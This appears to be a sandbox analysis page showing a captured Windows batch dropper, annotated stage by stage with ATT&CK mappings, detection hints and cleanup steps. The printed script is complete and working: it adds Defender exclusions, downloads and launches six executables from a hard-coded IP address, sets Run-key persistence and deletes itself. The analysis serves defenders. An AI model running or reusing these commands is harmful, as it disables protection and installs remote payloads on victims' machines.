Static | ZeroBOX
No static analysis available.
@echo off
REM Analyst annotations on a sandbox-captured batch dropper. Commands are left exactly as captured.
REM Visible stages: create staging directories, add Microsoft Defender path exclusions,
REM download six executables over plain HTTP from one hard-coded IP address, launch them,
REM register each one under the per-user Run key, then delete this script file.
REM NOTE(review): the AntiVirus*.exe file names look like masquerading as security software;
REM confirm against the downloaded binaries.
REM
REM Stage 1 - staging directories: C:\RM, C:\Programlog and C:\Programlog1.
REM -Force means an already existing directory is not treated as an error.
REM Nothing in this script writes to C:\Programlog1; presumably a payload or a later stage uses it - TODO confirm.
powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\RM'"
powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\Programlog'"
powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\Programlog1'"
REM Stage 2 - defense impairment (ATT&CK T1562.001): all three directories are added as
REM Microsoft Defender scan exclusions, and this happens before anything is downloaded into them.
REM Add-MpPreference normally needs an elevated session, so this step presumably only takes
REM effect when the script runs as administrator - verify in the sandbox trace.
REM Detection: Defender configuration-change event 5007, new values under
REM HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths, and powershell.exe command lines
REM containing Add-MpPreference -ExclusionPath.
powershell -Command "Add-MpPreference -ExclusionPath 'C:\RM'"
powershell -Command "Add-MpPreference -ExclusionPath 'C:\Programlog'"
powershell -Command "Add-MpPreference -ExclusionPath 'C:\Programlog1'"
REM Stage 3 - payload download (ATT&CK T1105): four AntiVirus*.exe files go to C:\RM and
REM main.exe plus main2.exe go to C:\Programlog, all from the same host and URL path.
REM The transfer is unencrypted HTTP to a bare IP address with no integrity check on the files.
REM Detection: powershell.exe started by cmd.exe that fetches executables from an IP-literal URL,
REM and new .exe files appearing in directories directly under the C: root.
powershell -Command "Invoke-WebRequest 'http://45.88.91.103/LgGFdDAm/AntiVirus.exe' -OutFile 'C:\RM\AntiVirus.exe'"
powershell -Command "Invoke-WebRequest 'http://45.88.91.103/LgGFdDAm/AntiVirus2.exe' -OutFile 'C:\RM\AntiVirus2.exe'"
powershell -Command "Invoke-WebRequest 'http://45.88.91.103/LgGFdDAm/AntiVirus3.exe' -OutFile 'C:\RM\AntiVirus3.exe'"
powershell -Command "Invoke-WebRequest 'http://45.88.91.103/LgGFdDAm/AntiVirus4.exe' -OutFile 'C:\RM\AntiVirus4.exe'"
Powershell -Command "Invoke-Webrequest 'http://45.88.91.103/LgGFdDAm/main.exe' -OutFile 'C:\Programlog\main.exe'"
Powershell -Command "Invoke-Webrequest 'http://45.88.91.103/LgGFdDAm/main2.exe' -OutFile 'C:\Programlog\main2.exe'"
REM Stage 4 - execution: every downloaded file is launched with start, which does not wait
REM for the launched program to finish. No check is made that a download succeeded.
start "" "C:\RM\AntiVirus.exe"
start "" "C:\RM\AntiVirus2.exe"
start "" "C:\RM\AntiVirus3.exe"
start "" "C:\RM\AntiVirus4.exe"
start "" "C:\Programlog\main.exe"
start "" "C:\Programlog\main2.exe"
REM Stage 5 - persistence (ATT&CK T1547.001): six values, MainProgram1 to MainProgram6, are
REM written to the current user's Run key so each payload starts again at that user's logon.
REM The HKCU hive is writable without elevation; /f overwrites an existing value without prompting.
REM Detection: registry value-set events on the Run key whose data points at C:\RM or C:\Programlog.
REM Cleanup on an affected host covers these six values, the three directories and the three
REM Defender exclusions added in stage 2.
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram1" /t REG_SZ /d "C:\RM\AntiVirus.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram2" /t REG_SZ /d "C:\RM\AntiVirus2.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram3" /t REG_SZ /d "C:\RM\AntiVirus3.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram4" /t REG_SZ /d "C:\RM\AntiVirus4.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram5" /t REG_SZ /d "C:\Programlog\main.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram6" /t REG_SZ /d "C:\Programlog\main2.exe" /f
REM Clean up temporary files (optional)
REM The deletion below is commented out, so it never runs. lander.vbs is not created anywhere
REM in this script; presumably it is an earlier-stage launcher left in the TEMP directory - TODO confirm.
REM del %TEMP%\lander.vbs
REM Stage 6 - self-deletion (ATT&CK T1070.004): the (goto) call with no label fails and ends
REM batch processing, with its error output discarded; the chained del then removes this
REM script's own file. The script will therefore be absent from disk after it has run, so
REM recovery relies on the sandbox capture or on process command-line logging.
(goto) 2>nul & del "%~f0"
No antivirus signatures available.
No IRMA results available.